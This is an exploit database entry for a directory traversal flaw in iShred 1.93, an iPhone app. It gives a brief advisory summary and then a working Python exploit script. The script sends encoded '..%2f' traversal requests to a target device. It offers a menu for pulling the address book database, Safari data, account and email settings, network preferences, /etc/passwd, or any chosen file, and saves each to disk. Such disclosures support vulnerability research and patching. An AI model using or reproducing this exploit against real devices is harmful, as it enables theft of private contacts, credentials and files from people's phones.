iPhone ishred 1.93 Directory Traversal

vendor:

iPhone ishred

by:

Khashayar Fereidani

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: iPhone ishred

Affected Version From: iPhone ishred 1.93

Affected Version To: iPhone ishred 1.93

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone 4 (IOS 4.0.1)

2011

iPhone ishred 1.93 Directory Traversal

A directory traversal vulnerability exists in iPhone ishred 1.93. This vulnerability allows an attacker to access sensitive files on the system. The vulnerability is due to insufficient input validation when handling requests. An attacker can exploit this vulnerability by sending a specially crafted request containing directory traversal sequences. This will allow the attacker to access sensitive files on the system.

Mitigation:

Input validation should be performed to prevent directory traversal attacks.

Source

Exploit-DB raw data:

----------------------------------------------------------------
Software : iPhone ishred 1.93
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://www.frontierdesign.com/iShred/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

Exploit:

#!/usr/bin/python
import urllib2
def urlread(url,file):
	url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
	u = urllib2.urlopen(url)
	localFile = open('result.html', 'w')
	localFile.write(u.read())
	localFile.close()
	print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone ishred 1.93 DT                -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:2112 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
	url='http://'+url
if ((id>0) and (id<6)):
	file=f[id]
	urlread(url,file)
if (id==6):
	file=raw_input("Enter Local File Address : ")
	urlread(url,file)